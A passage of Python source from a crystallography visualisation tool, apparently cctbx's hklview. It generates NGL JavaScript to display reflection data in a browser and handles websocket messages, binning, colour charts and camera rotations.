self.mprint("Creating new miller array through the operation: %s" %operation)
try:
newdata = None
newsigmas = None
ldic= {'data1': data1, 'sigmas1': sigmas1, 'data2': data2, 'sigmas2': sigmas2, 'dres': dres }
exec(operation, globals(), ldic)
newdata = ldic.get("newdata", None)
newarray._data = newdata
newsigmas = ldic.get("newsigmas", None)
newarray._sigmas = newsigmas
return newarray
except Exception as e:
self.mprint( str(e), verbose=0)
return None
def DrawNGLJavaScript(self, blankscene=False):
if not self.scene or not self.sceneisdirty:
return
if self.miller_array is None :
self.mprint( "Select an HKL scene to display reflections" )
return
self.mprint("Composing JavaScript...")
h_axis = flex.vec3_double([self.scene.axes[0]])
k_axis = flex.vec3_double([self.scene.axes[1]])
l_axis = flex.vec3_double([self.scene.axes[2]])
self.unit_h_axis = 1.0/h_axis.norm() * h_axis
self.unit_k_axis = 1.0/k_axis.norm() * k_axis
self.unit_l_axis = 1.0/l_axis.norm() * l_axis
self.unit_normal_hk = self.unit_h_axis.cross( self.unit_k_axis )
self.unit_normal_kl = self.unit_k_axis.cross( self.unit_l_axis )
self.unit_normal_lh = self.unit_l_axis.cross( self.unit_h_axis )
self.normal_hk = h_axis.cross( k_axis )
self.normal_kl = k_axis.cross( l_axis )
self.normal_lh = l_axis.cross( h_axis )
maxnorm = max(h_axis.norm(), max(k_axis.norm(), l_axis.norm()))
l1 = self.scene.renderscale * maxnorm * 1.1
l2= self.scene.renderscale * maxnorm * 1.15
Hstararrowstart = roundoff( [-self.unit_h_axis[0][0]*l1, -self.unit_h_axis[0][1]*l1, -self.unit_h_axis[0][2]*l1] )
Hstararrowend = roundoff( [self.unit_h_axis[0][0]*l1, self.unit_h_axis[0][1]*l1, self.unit_h_axis[0][2]*l1] )
Hstararrowtxt = roundoff( [self.unit_h_axis[0][0]*l2, self.unit_h_axis[0][1]*l2, self.unit_h_axis[0][2]*l2] )
Kstararrowstart = roundoff( [-self.unit_k_axis[0][0]*l1, -self.unit_k_axis[0][1]*l1, -self.unit_k_axis[0][2]*l1] )
Kstararrowend = roundoff( [self.unit_k_axis[0][0]*l1, self.unit_k_axis[0][1]*l1, self.unit_k_axis[0][2]*l1] )
Kstararrowtxt = roundoff( [self.unit_k_axis[0][0]*l2, self.unit_k_axis[0][1]*l2, self.unit_k_axis[0][2]*l2] )
Lstararrowstart = roundoff( [-self.unit_l_axis[0][0]*l1, -self.unit_l_axis[0][1]*l1, -self.unit_l_axis[0][2]*l1] )
Lstararrowend = roundoff( [self.unit_l_axis[0][0]*l1, self.unit_l_axis[0][1]*l1, self.unit_l_axis[0][2]*l1] )
Lstararrowtxt = roundoff( [self.unit_l_axis[0][0]*l2, self.unit_l_axis[0][1]*l2, self.unit_l_axis[0][2]*l2] )
# make arrow font size roughly proportional to radius of highest resolution shell
#fontsize = str(1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/3.0)))
if not self.miller_array:
fontsize = 1.0
else:
fontsize = 1.0 + roundoff(math.pow( max(self.miller_array.index_span().max()), 1.0/2.0))
#fontsize *= self.viewerparams.NGL.fontsize/7.0
fontsize = str(self.viewerparams.NGL.fontsize)
if blankscene:
axisfuncstr = "\nvar MakeHKL_Axis = function() { };\n"
else:
axisfuncstr = """
var fontsize = %s;
function MakeHKL_Axis(mshape)
{
// xyz arrows
// mshape.addSphere( [0,0,0] , [ 1, 1, 1 ], 0.3, 'Origin');
//blue-x
mshape.addArrow( %s, %s , [ 0, 0, 1 ], 0.1);
//green-y
mshape.addArrow( %s, %s , [ 0, 1, 0 ], 0.1);
//red-z
mshape.addArrow( %s, %s , [ 1, 0, 0 ], 0.1);
mshape.addText( %s, [ 0, 0, 1 ], fontsize, 'h');
mshape.addText( %s, [ 0, 1, 0 ], fontsize, 'k');
mshape.addText( %s, [ 1, 0, 0 ], fontsize, 'l');
};
""" %(fontsize, str(Hstararrowstart), str(Hstararrowend),
str(Kstararrowstart),
str(Kstararrowend), str(Lstararrowstart), str(Lstararrowend), Hstararrowtxt,
Kstararrowtxt, Lstararrowtxt)
if not blankscene:
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLMinData_from_dict(self.colour_scene_id)
maxcolourscalar = self.HKLMaxData_from_dict(self.colour_scene_id)
if self.viewerparams.sigma_color:
mincolourscalar = self.HKLMinSigmas_from_dict(self.colour_scene_id)
maxcolourscalar = self.HKLMaxSigmas_from_dict(self.colour_scene_id)
span = maxcolourscalar - mincolourscalar
ln = 60
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray = flex.double()
colourscalararray.append( val )
for j,sc in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
if self.HKLscene_from_dict(self.colour_scene_id).miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in enumerate(range(ln)):
val += incr
colourscalararray.append( val )
fomarrays = []
if self.HKLscene_from_dict(self.colour_scene_id).isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
# make fomln fom arrays of size len(colourscalararray) when calling colour_by_phi_FOM
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0), fomarrays[j] ) * 255.0)
else:
fomln =1
fomarrays = [1.0]
colourgradarrays.append( graphics_utils.colour_by_phi_FOM( colourscalararray*(math.pi/180.0) ) * 255.0)
else:
fomln = 1
fomarrays = [1.0]
colourgradarrays.append(graphics_utils.color_by_property(
properties= flex.double(colourscalararray),
selection=flex.bool( len(colourscalararray), True),
color_all=False,
gradient_type= self.viewerparams.color_scheme) * 255.0)
colors = self.HKLscene_from_dict(self.colour_scene_id).colors
radii = self.HKLscene_from_dict(self.radii_scene_id).radii
self.meanradius = flex.mean(radii)
if blankscene:
points = flex.vec3_double( [ ] )
colors = flex.vec3_double( [ ] )
radii = flex.double( [ ] )
self.bin_labels_type_idx = ("Resolution", "", -1, -1)
else:
points = self.scene.points
nrefls = points.size()
hkls = self.scene.indices
dres = self.scene.dres
if self.bin_labels_type_idx[0] =="Resolution":
colstr = "dres"
elif self.bin_labels_type_idx[0] =="Singletons":
colstr = "Singleton"
else:
if not blankscene:
colstr = self.HKLscene_from_dict(self.bin_labels_type_idx[3]).work_array.info().label_string()
data = self.scene.data
if not blankscene:
colourlabel = self.HKLscene_from_dict(self.colour_scene_id).colourlabel
fomlabel = self.HKLscene_from_dict(self.colour_scene_id).fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
colours = []
positions = []
radii2 = []
spbufttips = []
self.binvalsboundaries = []
if not blankscene:
if self.bin_labels_type_idx[0] =="Resolution":
self.binvalsboundaries = self.binvals
self.bindata = 1.0/self.scene.dres
elif self.bin_labels_type_idx[0] =="Singletons":
self.binvalsboundaries = self.binvals
self.bindata = self.scene.singletonsiness
else:
dummy, self.binvalsboundaries = self.get_matched_binarray()
self.binvalsboundaries.extend( self.binvals )
self.binvalsboundaries.sort()
if self.binvalsboundaries[0] < 0.0:
self.binvalsboundaries.append(0.0)
self.binvalsboundaries.sort()
self.bindata = self.MatchBinArrayToSceneArray()
self.nbinvalsboundaries = len(self.binvalsboundaries)
# avoid resetting opacities of bins unless we change the number of bins
if self.oldnbinvalsboundaries != self.nbinvalsboundaries:
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(self.nbinvalsboundaries + 1) ])
self.oldnbinvalsboundaries = self.nbinvalsboundaries
# Un-binnable data are scene data values where there are no matching reflections in the bin data
# Put these in a separate bin and be diligent with the book keeping!
for ibin in range(self.nbinvalsboundaries+1): # adding the extra bin for un-binnable data
colours.append([]) # colours and positions are 3 x size of data()
positions.append([])
radii2.append([])
spbufttips.append([])
def data2bin(d, binvalsboundaries, nbinvalsboundaries):
for ibin, binval in enumerate(binvalsboundaries):
if math.isnan(d): # NaN values are un-binnable. Tag them for an additional last bin
return nbinvalsboundaries
if (ibin+1) == nbinvalsboundaries:
return ibin
if d > binval and d <= binvalsboundaries[ibin+1]:
return ibin
raise Sorry("data2bin: Should never get here")
def getprecision(v1,v2):
diff = abs(v1-v2); precision = 1; e = 1
while diff*e < 1.0:
e *= 10
precision += 1
return precision
if nrefls > 0 and self.bindata.size() != points.size():
raise Sorry("Not the same number of reflections in bin-data and displayed data")
start_time = time.time()
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( self.bindata[i], self.binvalsboundaries, self.nbinvalsboundaries )
positions[ibin].extend( graphics_utils.flt_roundoffvec3(hklstars, 2) )
colours[ibin].extend( graphics_utils.flt_roundoffvec3(colors[i], 2) )
radii2[ibin].append( graphics_utils.flt_roundoff(radii[i], 2) )
spbufttips[ibin].append( i )
elapsed_time = time.time() - start_time
self.mprint("elapsed time: %s" %elapsed_time, verbose=2)
spherebufferstr = self.colstraliases
negativeradiistr = ""
cntbin = 0
self.binstrs = []
self.bin_infotpls = []
if self.nuniqueval < self.params.nbins:
self.mprint("%d bins was requested but %s data has only %d unique value(s)!" %(self.params.nbins, colstr, self.nuniqueval), 0)
for ibin in range(self.nbinvalsboundaries+1):
mstr =""
nreflsinbin = len(radii2[ibin])
if nreflsinbin == 0:
continue
bin2 = float("nan"); bin1= float("nan") # indicates un-binned data
if ibin == self.nbinvalsboundaries:
mstr= "bin[%d] has %d reflections with no %s values (assigned to %2.3f)" %(cntbin, nreflsinbin, \
colstr, bin1)
precision = 3
if ibin < (self.nbinvalsboundaries-1):
bin1 = self.binvalsboundaries[ibin]
bin2 = self.binvalsboundaries[ibin+1]
bin3 = bin2
if ibin < (self.nbinvalsboundaries-2):
bin3= self.binvalsboundaries[ibin+2]
if colstr=="dres":
bin1= 1.0/self.binvalsboundaries[ibin]
bin2= 1.0/self.binvalsboundaries[ibin+1]
if ibin < (self.nbinvalsboundaries-2):
bin3= 1.0/self.binvalsboundaries[ibin+2]
#calculate precision by comparing a bin value with bin value below and above it
prec1 = getprecision(bin1, bin2)
prec2 = prec1
if bin2 != bin3:
prec2 = getprecision(bin3, bin2)
precision = max(prec1, prec2)
# format bin values string with necessary decimal places (precision)
binformatstr = "]%2." + str(precision) + "f; %2." + str(precision) + "f]"
mstr= "bin[%d] has %d reflections with %s in " %(cntbin, nreflsinbin, colstr)
mstr += binformatstr %(bin1, bin2)
self.bin_infotpls.append( roundoff((nreflsinbin, bin1, bin2 ), precision) )
self.binstrs.append(mstr)
self.mprint(mstr, verbose=0)
spherebufferstr += "\n// %s\n" %mstr
#spherebufferstr += " ttips.push( [ ] );"
ttlst = [-1]
ttlst.extend(spbufttips[ibin])
ttipsobj = "{ ids: " + str( ttlst ) + """,
getPosition: function() { return { x:0, y:0 }; } // dummy function to avoid crash
} """
# + ",\n getPosition: function() { return stage.mouseObserver.canvasPosition; } }"
spherebufferstr += " ttips.push( %s );" %str( ttipsobj )
spherebufferstr += """
positions.push( new Float32Array( %s ) );
colours.push( new Float32Array( %s ) );
radii.push( new Float32Array( %s ) );
shapebufs.push( new NGL.%s({
position: positions[%d],
color: colours[%d], """ %(str(positions[ibin]), str(colours[ibin]), \
str(radii2[ibin]), self.primitivetype, cntbin, \
cntbin)
if self.primitivetype == "SphereBuffer":
spherebufferstr += "\n radius: radii[%d]," %cntbin
spherebufferstr += "\n picking: ttips[%d]," %cntbin
if self.primitivetype == "PointBuffer":
spherebufferstr += "\n }, {pointSize: %1.2f})\n" %self.viewerparams.scale
else:
if self.high_quality:
spherebufferstr += """
})
);
"""
else:
spherebufferstr += """
}, { disableImpostor: true
, sphereDetail: 0 }) // rather than default value of 2 icosahedral subdivisions
);
"""
spherebufferstr += "shape.addBuffer(shapebufs[%d]);\n alphas.push(1.0);\n" %cntbin
cntbin += 1
if self.ngl_settings.bin_opacities == "":
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(cntbin) ])
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities,
"bin_infotpls": self.bin_infotpls,
"bin_data_label": self.bin_labels_type_idx[0],
"tooltip_opacity": self.ngl_settings.tooltip_alpha
} )
if not blankscene:
colourgradstrs = "colourgradvalarray = new Array(%s);\n" %fomln
# if displaying phases from map coefficients together with fom values then
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
rgb = (int(val[1][0]), int(val[1][1]), int(val[1][2]) )
gradval = "rgba(%s, %s, %s, %s)" %(rgb[0], rgb[1], rgb[2], alpha)
if j%10 == 0 or j==len(self.colourgradientvalues)-1 :
vstr = str( roundoff(val[0], 2, as_string=True) )
colourgradstr.append([vstr , gradval])
colourgradstrs += " colourgradvalarray[%s] = %s;\n" %(g, str(colourgradstr) )
colourscriptstr = """
//colourgradvalarrays
%s
ColourChart("%s", "%s");
""" % (colourgradstrs, colourlabel, fomlabel)
qualitystr = """ , { disableImpostor: true
, sphereDetail: 0 } // rather than default value of 2 icosahedral subdivisions
"""
if self.high_quality:
qualitystr = ""
self.NGLscriptstr = ""
if not blankscene:
self.NGLscriptstr = HKLJavaScripts.NGLscriptstr % ( self.ngl_settings.tooltip_alpha,
'\"' + self.camera_type + '\"', axisfuncstr, spherebufferstr,
negativeradiistr, colourscriptstr)
WebsockMsgHandlestr = HKLJavaScripts.WebsockMsgHandlestr %(self.websockport, cntbin,
str(self.verbose>=2).lower(), self.__module__, self.__module__, qualitystr )
self.NGLscriptstr = WebsockMsgHandlestr + self.NGLscriptstr
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
if not blankscene:
if self.WaitforHandshake():
nwait = 0
while self.viewmtrx is None and nwait < self.handshakewait:
#time.sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
self.GetClipPlaneDistances()
self.GetBoundingBox()
self.OrigClipFar = self.clipFar
self.OrigClipNear = self.clipNear
self.SetMouseSpeed( self.ngl_settings.mouse_sensitivity )
self.sceneisdirty = False
self.lastscene_id = self.viewerparams.scene_id
def ProcessMessage(self, message):
try:
if sys.version_info[0] > 2:
ustr = str
else:
ustr = unicode
if isinstance(message, bytes) and isinstance(self.lastmsg, ustr) and "Imageblob" in self.lastmsg:
self.mprint( "Saving image to file", verbose=1)
with open( self.imagename, "wb") as imgfile:
imgfile.write( message)
if isinstance(message, ustr) and message != "":
if "Orientation" in message:
self.ProcessOrientationMessage(message)
elif 'Received message:' in message:
self.mprint( message, verbose=2)
elif "websocket" in message:
self.mprint( message, verbose=1)
elif "Refreshing" in message or "disconnecting" in message:
self.mprint( message, verbose=1)
self.WBmessenger.Sleep(self.sleeptime)
elif "AutoViewSet" in message:
self.set_volatile_params()
elif "JavaScriptCleanUpDone:" in message:
self.mprint( message, verbose=1)
self.WBmessenger.Sleep(0.5) # time for browser to clean up
if not self.isnewfile:
self.WBmessenger.StopWebsocket()
elif "JavaScriptError:" in message:
self.mprint( message, verbose=0)
elif "Expand" in message:
self.mprint( message, verbose=2)
elif "Connection lost" in message:
self.mprint( message, verbose=1)
elif "Imageblob" in message:
self.mprint( "Image to be received", verbose=1)
elif "ImageWritten" in message:
self.mprint( "Image saved to file", verbose=0)
elif "ReturnClipPlaneDistances:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.clipNear = flst[0]
self.clipFar = flst[1]
self.cameraPosZ = flst[2]
elif "ReturnBoundingBox:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.boundingX = flst[0]
self.boundingY = flst[1]
self.boundingZ = flst[2]
elif "ReturnMouseSpeed" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
if flst[0] is not None and not cmath.isnan(flst[0]):
self.ngl_settings.mouse_sensitivity = flst[0]
elif "tooltip_id:" in message:
ttipids = message.split("tooltip_id:")[1]
hklid = eval(message.split("tooltip_id:")[1])[0]
sym_id = eval(message.split("tooltip_id:")[1])[1]
is_friedel_mate = eval(message.split("tooltip_id:")[1])[2]
rotmx = None
hkls = self.scene.indices
if not is_friedel_mate:
ttip = self.GetTooltipOnTheFly(hklid, sym_id)
else:
hklid = hklid % len(hkls)
ttip = self.GetTooltipOnTheFly(hklid, sym_id, anomalous=True)
self.AddToBrowserMsgQueue("ShowThisTooltip", ttip)
else:
if "Ready " in message:
self.mprint( message, verbose=5)
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10), verbose=0)
self.lastmsg = message
def GetCameraPosRotTrans(self, viewmtrx):
lst = viewmtrx.split(",")
flst = [float(e) for e in lst]
ScaleRotMx = matrix.sqr( (flst[0], flst[4], flst[8],
flst[1], flst[5], flst[9],
flst[2], flst[6], flst[10]
)
)
cameratranslation = (flst[12], flst[13], flst[14])
self.mprint("translation: %s" %str(roundoff(cameratranslation)), verbose=3)
alllst = roundoff(flst)
self.mprint("""OrientationMatrix matrix:
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
Distance: %s
""" %tuple(alllst), verbose=4)
rotdet = ScaleRotMx.determinant()
if rotdet <= 0.0:
self.mprint("Negative orientation matrix determinant!!", verbose=1)
self.SetAutoView() # return old values as a fall back even if they're out of date
return self.cameraPosZ, self.currentRotmx, self.cameratranslation
else:
cameradist = math.pow(rotdet, 1.0/3.0)
self.mprint("Scale distance: %s" %roundoff(cameradist), verbose=3)
currentRotmx = matrix.identity(3)
if cameradist > 0.0:
currentRotmx = ScaleRotMx/cameradist
cameraPosZ = cameradist
return cameraPosZ, currentRotmx, cameratranslation
def ProcessOrientationMessage(self, message):
if message.find("NaN")>=0 or message.find("undefined")>=0:
return
if "OrientationBeforeReload:" in message:
#sleep(0.2)
if not self.isnewfile:
self.viewmtrx = message[ message.find("\n") + 1: ]
self.lastviewmtrx = self.viewmtrx
self.isnewfile = False
self.viewmtrx = message[ message.find("\n") + 1: ]
self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
rotlst = roundoff(self.currentRotmx.elems)
self.mprint("""Rotation matrix:
%s, %s, %s
%s, %s, %s
%s, %s, %s
""" %rotlst, verbose=3)
if "MouseMovedOrientation:" in message:
self.params.mouse_moved = True
if self.currentRotmx.is_r3_rotation_matrix():
# Round off matrix elements to avoid machine imprecision errors that might cast
# any matrix element into a number strictly larger than 1 which would
# crash r3_rotation_matrix_as_x_y_z_angles()
self.currentRotmx = matrix.sqr(roundoff(self.currentRotmx.elems, 9) )
angles = self.currentRotmx.r3_rotation_matrix_as_x_y_z_angles(deg=True)
self.mprint("angles: %s" %str(roundoff(angles)), verbose=3)
z_vec = flex.vec3_double( [(0,0,1)])
self.rot_zvec = z_vec * self.currentRotmx
self.mprint("Rotated cartesian Z direction : %s" %str(roundoff(self.rot_zvec[0])), verbose=3)
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().fractionalization_matrix() )
self.rot_recip_zvec = self.rot_zvec * rfracmx
self.rot_recip_zvec = (1.0/self.rot_recip_zvec.norm()) * self.rot_recip_zvec
self.mprint("Rotated reciprocal L direction : %s" %str(roundoff(self.rot_recip_zvec[0])), verbose=3)
def WaitforHandshake(self, sec=5):
nwait = 0
while not self.WBmessenger.browserisopen :
#time.sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > sec:
return False
return True
def OpenBrowser(self):
if self.viewerparams.scene_id is not None and not self.WBmessenger.websockclient \
and not self.WBmessenger.browserisopen or self.isnewfile:
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file:///" + os.path.abspath( self.hklfname )
self.url = self.url.replace("\\", "/")
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname, verbose=1)
if self.UseOSBrowser=="default":
if not webbrowser.open(self.url, new=0):
self.mprint("Could not open the default web browser")
return False
if self.UseOSBrowser != "default" and self.UseOSBrowser != "":
browserpath = self.UseOSBrowser + " %s"
if not webbrowser.get(browserpath).open(self.url, new=0):
self.mprint("Could not open web browser, %s" %self.UseOSBrowser)
return False
self.SendInfoToGUI({ "html_url": self.url } )
self.WBmessenger.browserisopen = True
self.isnewfile = False
return True
return False
def set_camera_type(self):
self.camera_type = self.ngl_settings.camera_type
def set_show_tooltips(self):
msg = "%s" %self.ngl_settings.show_tooltips
self.AddToBrowserMsgQueue("DisplayTooltips", msg)
def set_tooltip_opacity(self):
msg = "%f" %self.ngl_settings.tooltip_alpha
self.AddToBrowserMsgQueue("TooltipOpacity", msg)
def SetOpacities(self, bin_opacities_str):
retstr = ""
if self.miller_array and bin_opacities_str and not self.isinjected:
self.ngl_settings.bin_opacities = bin_opacities_str
bin_opacitieslst = eval(self.ngl_settings.bin_opacities)
for binopacity in bin_opacitieslst:
alpha = binopacity[0] # float(binopacity.split(",")[0])
bin = binopacity[1] # int(binopacity.split(",")[1])
retstr += self.set_opacity(bin, alpha)
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities } )
self.mprint( retstr, verbose=1)
def set_opacity(self, bin, alpha):
if bin > self.nbinvalsboundaries-1:
return "There are only %d bins present\n" %self.nbinvalsboundaries
msg = "%d, %f" %(bin, alpha)
self.AddToBrowserMsgQueue("alpha", msg)
return "Opacity %s set on bin[%s]\n" %(alpha, bin)
def RedrawNGL(self):
self.AddToBrowserMsgQueue("Redraw")
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", verbose=1)
if not self.OpenBrowser():
self.AddToBrowserMsgQueue("Reload")
def JavaScriptCleanUp(self, ):
self.AddToBrowserMsgQueue("JavaScriptCleanUp")
def ExpandInBrowser(self, P1=True, friedel_mate=True):
if self.sceneisdirty:
self.mprint( "Not expanding in browser", verbose=1)
return
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if P1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
retmsg = "Expanding to P1 in browser"
if not self.miller_array.is_unique_set_under_symmetry():
retmsg += "\nNot all reflections are in the same asymmetric unit in reciprocal space.\n"
retmsg += "Some reflections might be displayed on top of one another.\n"
self.mprint( retmsg, verbose=1)
else:
unique_rot_ops = [ self.symops[0] ] # No P1 expansion. So only submit the identity matrix
if friedel_mate and not self.miller_array.anomalous_flag():
msgtype += "Friedel"
self.mprint( "Expanding Friedel mates in browser", verbose=1)
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n" # add rotation matrix to end of message string
self.AddToBrowserMsgQueue(msgtype, msg)
self.GetBoundingBox() # bounding box changes when the extent of the displayed lattice changes
def AddVector(self, s1, s2, s3, t1, t2, t3, isreciprocal=True, label="",
r=0, g=0, b=0, name="", radius = 0.15):
"""
Place vector from {s1, s2, s3] to [t1, t2, t3] with colour r,g,b and label
If name=="" creation is deferred until AddVector is eventually called with name != ""
These vectors are then joined in the same NGL representation
"""
uc = self.miller_array.unit_cell()
vec1 = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
vec2 = (t1*self.scene.renderscale, t2*self.scene.renderscale, t3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute the cartesian coordinates
# for floating valued miller indices with the transpose of the fractionalization matrix
vec1 = list( vec1 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
vec2 = list( vec2 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec1 = [ vec1[0], vec1[1], vec1[2] ]
svec2 = [ vec2[0], vec2[1], vec2[2] ]
else:
vec1 = list( vec1 * matrix.sqr(uc.orthogonalization_matrix()) )
vec2 = list( vec2 * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 1.0/self.scene.renderscale
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec1 = [ vscale*vec1[0], vscale*vec1[1], vscale*vec1[2] ]
svec2 = [ vscale*vec2[0], vscale*vec2[1], vscale*vec2[2] ]
self.mprint("cartesian vector is: %s to %s" %(str(roundoff(svec1)), str(roundoff(svec2))), verbose=2)
svec = [svec2[0]-svec1[0], svec2[1]-svec1[1], svec2[2]-svec1[2] ]
xyvec = svec[:] # deep copying
xyvec[2] = 0.0 # projection vector of svec in the xy plane
xyvecnorm = math.sqrt( xyvec[0]*xyvec[0] + xyvec[1]*xyvec[1] )
if xyvecnorm > 0.0:
angle_x_xyvec = math.acos( xyvec[0]/xyvecnorm )*180.0/math.pi
angle_y_xyvec = math.acos( xyvec[1]/xyvecnorm )*180.0/math.pi
else:
angle_x_xyvec = 90.0
angle_y_xyvec = 90.0
yzvec = svec[:]
yzvec[0] = 0.0 # projection vector of svec in the yz plane
yzvecnorm = math.sqrt( yzvec[1]*yzvec[1] + yzvec[2]*yzvec[2] )
if yzvecnorm > 0.0:
angle_y_yzvec = math.acos( yzvec[1]/yzvecnorm )*180.0/math.pi
angle_z_yzvec = math.acos( yzvec[2]/yzvecnorm )*180.0/math.pi
else:
angle_y_yzvec = 90.0
angle_z_yzvec = 90.0
svecnorm = math.sqrt( svec[0]*svec[0] + svec[1]*svec[1] + svec[2]*svec[2] )
angle_x_svec = math.acos( svec[0]/svecnorm )*180.0/math.pi
angle_y_svec = math.acos( svec[1]/svecnorm )*180.0/math.pi
angle_z_svec = math.acos( svec[2]/svecnorm )*180.0/math.pi
if angle_y_svec > 90.0:
angle_x_xyvec = -angle_x_xyvec
self.mprint("angles in xy plane to x,y axis are: %s, %s" %(angle_x_xyvec, angle_y_xyvec), verbose=2)
self.mprint("angles in yz plane to y,z axis are: %s, %s" %(angle_y_yzvec, angle_z_yzvec), verbose=2)
self.mprint("angles to x,y,z axis are: %s, %s, %s" %(angle_x_svec, angle_y_svec, angle_z_svec ), verbose=2)
self.mprint("deferred rendering vector from (%s, %s, %s) to (%s, %s, %s)" %(s1, s2, s3, t1, t2, t3), verbose=2)
self.AddToBrowserMsgQueue("AddVector", "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" \
%tuple(svec1 + svec2 + [r, g, b, label, name, radius]) )
return angle_x_xyvec, angle_z_svec
def PointVectorPerpendicularToClipPlane(self):
rotmx = self.Euler2RotMatrix(( self.angle_x_xyvec, self.angle_z_svec, 0.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
return rotmx
def PointVectorParallelToClipPlane(self):
rotmx = self.Euler2RotMatrix(( self.angle_x_xyvec, self.angle_z_svec+90.0, 90.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.currentRotmx = rotmx
self.RotateMxStage(rotmx)
return rotmx
def RotateAroundFracVector(self, phi, r1,r2,r3, prevrotmx = matrix.identity(3), isreciprocal=False, quietbrowser=True):
if isreciprocal:
# Assuming vector is in reciprocal space coordinates turn it into cartesian
cartvec = list( (r1,r2,r3) * matrix.sqr(self.miller_array.unit_cell().fractionalization_matrix()).transpose() )
else:
# Assuming vector is in real space fractional coordinates turn it into cartesian
cartvec = list( (r1,r2,r3) * matrix.sqr(self.miller_array.unit_cell().orthogonalization_matrix()) )
# Rodrigues rotation formula for rotation by phi angle around a vector going through origo
# See http://mathworld.wolfram.com/RodriguesRotationFormula.html
# \mathbf I+\left(\sin\,\varphi\right)\mathbf W+\left(2\sin^2\frac{\varphi}{2}\right)\mathbf W^2
normR = math.sqrt(cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
ux = cartvec[0]/normR
uy = cartvec[1]/normR
uz = cartvec[2]/normR
W = matrix.sqr([0, -uz, uy, uz, 0, -ux, -uy, ux, 0])
I = matrix.identity(3)
sin2phi2 = math.sin(phi/2)
sin2phi2 *= sin2phi2
RotMx = I + math.sin(phi)*W + 2* sin2phi2 * W*W
self.currentRotmx = RotMx * prevrotmx # impose any other rotation already performed
self.RotateMxStage(self.currentRotmx, quietbrowser)
return self.currentRotmx, [ux, uy, uz]
def SpinAnimate(self, r1, r2, r3):
self.AddToBrowserMsgQueue("SpinAnimate", "%s, %s, %s" %(r1, r2, r3) )
def DrawUnitCell(self, scale=1):
if scale is None:
self.RemoveVectors("unitcell")
self.mprint( "Removing real space unit cell", verbose=1)
return
uc = self.miller_array.unit_cell()
rad = 0.2 # scale # * 0.05 # 1000/ uc.volume()
self.AddVector(0,0,0, scale,0,0, False, label="a", r=0.5, g=0.8, b=0.8, radius=rad)
